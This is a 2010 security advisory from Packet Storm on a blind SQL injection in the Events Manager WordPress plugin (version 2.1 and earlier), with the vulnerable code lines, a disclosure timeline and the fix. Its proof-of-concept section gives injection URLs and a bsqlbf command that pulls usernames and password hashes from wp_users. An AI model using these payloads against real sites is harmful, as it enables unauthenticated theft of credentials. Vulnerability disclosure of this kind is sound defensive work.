Events Manager Wordpress Plugin 2.1 Blind SQL Injection

2010-05-12T00:00:00
ID PACKETSTORM:89435
Type packetstorm
Reporter Danilo Massa
Modified 2010-05-12T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
=============================================  
- - Release date: May 10th, 2010  
- - Discovered by: Danilo Massa  
- - Severity: High  
=============================================  
I. VULNERABILITY  
- -------------------------  
Events Manager Wordpress plugin <= 2.1 Blind SQL Injection  
II. BACKGROUND  
- -------------------------  
Events Manager 2.0 is a full-featured event management solution for Wordpress.   
Events Manager supports recurring events, locations data, RSVP and maps.   
With Events Manager you can plan and publish your tour, or let people reserve   
spaces for your weekly meetings.   
You can then add events list, calendars and description to your blog using a sidebar   
widget or shortcodes; if you’re web designer you can simply employ the template tags   
provided by Events Manager.   
III. INTRODUCTION  
- -------------------------  
Events Manager versions 2.0rc2 and 2.1 have a blind sql injection when a single event page is  
shown to the users. No authentication required.  
IV. DESCRIPTION  
- -------------------------  
Input passed via the "event_id" parameter to the admin defined event page is not properly   
sanitised before being used in a SQL query.  
This happen in the events-manager.php file in the following lines (version 2.1):  
436: $event_ID = dbem_sanitize_request($_REQUEST ['event_id']);  
534: $event_ID = dbem_sanitize_request($_REQUEST ['event_id']);  
The dbem_sanitize_request only quote sql reserved characters and do not force event_id parameter  
to be an integer number.  
  
V. PROOF OF CONCEPT  
- -------------------------  
Below is a harmless test that can be executed on the page that show a single event.  
http://<wordpress_site>/<event_page>?event_id=<existing_event_id>%20and%201=1  
http://<wordpress_site>/<event_page>?event_id=<existing_event_id>%20and%201=0  
a more complex test case can be executed using Blind Sql Injection Brute Forcer version 2:  
./bsqlbf-v2-4.pl -url http://<wordpress_site>/<event_page>?event_id=<existing_event_id> -blind event_id -sql "(SELECT concat(user_login,0x3a,user_pass) from wp_users limit 0,1)" -database 1 -type 0 -match "<string_in_existing_event_web_page>"  
getting the first user in the Wordpress database and its password hash.  
VI. BUSINESS IMPACT  
- -------------------------  
An attacker could exploit the vulnerability to retrieve any data from  
databases accessible by Wordpress db user.  
VII. SYSTEMS AFFECTED  
- -------------------------  
Versions 2.0rc2 and 2.1 are vulnerable.  
Versions <= 2.0rc2 could be vulnerable.  
VIII. SOLUTION  
- -------------------------  
Upgrade to a patched release (>= 2.2) or as quick workaround put a  
settype($event_ID, "int");  
just after lines listed in the DESCRIPTION section.  
IX. REFERENCES  
- -------------------------  
http://davidebenini.it/wordpress-plugins/events-manager/  
http://davidebenini.it/blog/  
X. CREDITS  
- -------------------------  
The vulnerability has been discovered by Danilo Massa  
danilo(under_score)m(at)yahoo(dot)com  
XI. VULNERABILITY HISTORY  
- -------------------------  
April 08th, 2010: Vulnerability identification  
April 09th, 2010: Vendor notification  
April 10th, 2010: Vendor release an updated version (2.2)  
May 10th, 2010: Vulnerability disclosure  
XII. LEGAL NOTICES  
- -------------------------  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise. I accept no  
responsibility for any damage caused by the use or misuse of this   
information.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v2.0.14 (MingW32)  
iQEcBAEBAgAGBQJL6b61AAoJEIA+zY+H2Pz8QeUH/1XN05uASSiEYn14eTpUBjGC  
zSx6+B0c9e4VwcX8Dj5bayK6ibn2FXiaeMtI2ZjFqL8alACtTHVWG3qTn1uDqX78  
ShOd8Fxeql0OCw5Fp0ypN6KikLdL6ErxloEM9HpiWZJTksShtHkg8d1gyKpWXdax  
ziTCPFtNj1PFLlxQYIdlVT5JtvrxaR/oOZBIXqT/hKrCTLnARpphjj95cU6h539e  
NjVFlWMM7UsQceafmlgMD6s5cST9s/hXE6+FdHSWFwM7JGL/cVEyLXWhXWie8Opy  
+sFIbWZ/TUG0kT9bhJl/serHsH1cAn649QcpQW38fm+tIpUY0AZqkPuHX3/5AFI=  
=xtv1  
-----END PGP SIGNATURE-----  
  
  
  
  
`